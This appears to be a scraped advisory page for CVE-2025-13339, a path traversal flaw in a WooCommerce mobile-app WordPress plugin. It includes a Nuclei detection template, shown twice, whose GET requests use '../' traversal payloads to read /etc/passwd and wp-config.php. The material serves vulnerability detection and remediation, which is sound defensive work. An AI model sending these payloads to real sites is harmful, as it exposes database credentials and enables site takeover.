Hippoo Mobile App for WooCommerce <= 1.7.1 - Unauthenticated Arbitrary File Read

CVE-2025-13339

Early Release

Description

The Hippoo Mobile App for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to and including 1.7.1 via the template_redirect() function. The plugin registers 'hippoo_serve' as a WordPress query variable and uses it to serve PWA files from the pwa/ directory. In vulnerable versions, the user-supplied value is concatenated directly into a filesystem path without any sanitization or directory confinement check, then passed to readfile(). This allows unauthenticated attackers to read arbitrary files on the server by injecting directory traversal sequences (../).

Severity

High

CVSS Score

7.5

Exploit Probability

Affected Product

hippoo-mobile-app-for-woocommerce

Published Date

June 11, 2026

Template Author

pussycat0x

CVE-2025-13339.yaml

id: CVE-2025-13339

info:
  name: Hippoo Mobile App for WooCommerce <= 1.7.1 - Unauthenticated Arbitrary File Read
  author: pussycat0x
  severity: high
  description: |
    The Hippoo Mobile App for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to and including 1.7.1 via the template_redirect() function. The plugin registers 'hippoo_serve' as a WordPress query variable and uses it to serve PWA files from the pwa/ directory. In vulnerable versions, the user-supplied value is concatenated directly into a filesystem path without any sanitization or directory confinement check, then passed to readfile(). This allows unauthenticated attackers to read arbitrary files on the server by injecting directory traversal sequences (../).
  impact: |
    An unauthenticated attacker can read any file readable by the web server process (www-data), including wp-config.php (database credentials, authentication keys and salts), /etc/passwd, server configuration files, and application source code. Exfiltration of wp-config.php alone enables database compromise and WordPress cookie forgery for full site takeover.
  remediation: Update the Hippoo Mobile App for WooCommerce plugin to version 1.7.2 or later. The patch adds realpath() canonicalization and a strpos() prefix check to confine file reads to the pwa/ directory.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hippoo/hippoo-mobile-app-for-woocommerce-171-unauthenticated-arbitrary-file-read
    - https://plugins.trac.wordpress.org/changeset/3412701/
    - https://patchstack.com/database/wordpress/plugin/hippoo/vulnerability/wordpress-hippoo-mobile-app-for-woocommerce-plugin-1-7-1-unauthenticated-arbitrary-file-read-vulnerability
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-13339
    cwe-id: CWE-22
    epss-score: 0.00105
    epss-percentile: 0.28031
  metadata:
    verified: true
    max-request: 2
    vendor: hippoo
    product: hippoo-mobile-app-for-woocommerce
    framework: wordpress
    shodan-query: http.component:"WordPress"
    fofa-query: body="hippoo"
  tags: cve,cve2025,wordpress,wp-plugin,hippoo,lfi,woocommerce

http:
  - method: GET
    path:
      - "{{BaseURL}}/?hippoo_serve=../../../../../../../etc/passwd"
      - "{{BaseURL}}/?hippoo_serve=../../../../wp-config.php"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body) || contains_all(body, 'DB_NAME', 'DB_PASSWORD')"
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100ec72f94d3887a98a1a1942acad242c9fd319ff325eaaa374a109b3eaae747521022100af738e871bf6c78fb61e494a506be94865265db56b8f92a9c4a955063f47b1e0:922c64590222798bb761d5b6d8e72950

7.5Score

CVSS Metrics

CVSS Vector:

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

CVE ID:

cve-2025-13339

CWE ID:

cwe-22

References

https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hippoo/hippoo-mobile-app-for-woocommerce-171-unauthenticated-arbitrary-file-read https://plugins.trac.wordpress.org/changeset/3412701/https://patchstack.com/database/wordpress/plugin/hippoo/vulnerability/wordpress-hippoo-mobile-app-for-woocommerce-plugin-1-7-1-unauthenticated-arbitrary-file-read-vulnerability

Remediation Steps

Update the Hippoo Mobile App for WooCommerce plugin to version 1.7.2 or later. The patch adds realpath() canonicalization and a strpos() prefix check to confine file reads to the pwa/ directory.

Description

id: CVE-2025-13339

info:
  name: Hippoo Mobile App for WooCommerce <= 1.7.1 - Unauthenticated Arbitrary File Read
  author: pussycat0x
  severity: high
  description: |
    The Hippoo Mobile App for WooCommerce plugin for WordPress is vulnerable to Path Traversal in all versions up to and including 1.7.1 via the template_redirect() function. The plugin registers 'hippoo_serve' as a WordPress query variable and uses it to serve PWA files from the pwa/ directory. In vulnerable versions, the user-supplied value is concatenated directly into a filesystem path without any sanitization or directory confinement check, then passed to readfile(). This allows unauthenticated attackers to read arbitrary files on the server by injecting directory traversal sequences (../).
  impact: |
    An unauthenticated attacker can read any file readable by the web server process (www-data), including wp-config.php (database credentials, authentication keys and salts), /etc/passwd, server configuration files, and application source code. Exfiltration of wp-config.php alone enables database compromise and WordPress cookie forgery for full site takeover.
  remediation: Update the Hippoo Mobile App for WooCommerce plugin to version 1.7.2 or later. The patch adds realpath() canonicalization and a strpos() prefix check to confine file reads to the pwa/ directory.
  reference:
    - https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/hippoo/hippoo-mobile-app-for-woocommerce-171-unauthenticated-arbitrary-file-read
    - https://plugins.trac.wordpress.org/changeset/3412701/
    - https://patchstack.com/database/wordpress/plugin/hippoo/vulnerability/wordpress-hippoo-mobile-app-for-woocommerce-plugin-1-7-1-unauthenticated-arbitrary-file-read-vulnerability
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2025-13339
    cwe-id: CWE-22
    epss-score: 0.00105
    epss-percentile: 0.28031
  metadata:
    verified: true
    max-request: 2
    vendor: hippoo
    product: hippoo-mobile-app-for-woocommerce
    framework: wordpress
    shodan-query: http.component:"WordPress"
    fofa-query: body="hippoo"
  tags: cve,cve2025,wordpress,wp-plugin,hippoo,lfi,woocommerce

http:
  - method: GET
    path:
      - "{{BaseURL}}/?hippoo_serve=../../../../../../../etc/passwd"
      - "{{BaseURL}}/?hippoo_serve=../../../../wp-config.php"

    stop-at-first-match: true

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body) || contains_all(body, 'DB_NAME', 'DB_PASSWORD')"
          - "status_code == 200"
        condition: and
# digest: 4b0a00483046022100ec72f94d3887a98a1a1942acad242c9fd319ff325eaaa374a109b3eaae747521022100af738e871bf6c78fb61e494a506be94865265db56b8f92a9c4a955063f47b1e0:922c64590222798bb761d5b6d8e72950

Hippoo Mobile App for WooCommerce <= 1.7.1 - Unauthenticated Arbitrary File Read

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps

Hippoo Mobile App for WooCommerce <= 1.7.1 - Unauthenticated Arbitrary File Read

Description

Severity

CVSS Score

Exploit Probability

Affected Product

Published Date

Template Author

Nuclei Template

CVSS Metrics

References

Remediation Steps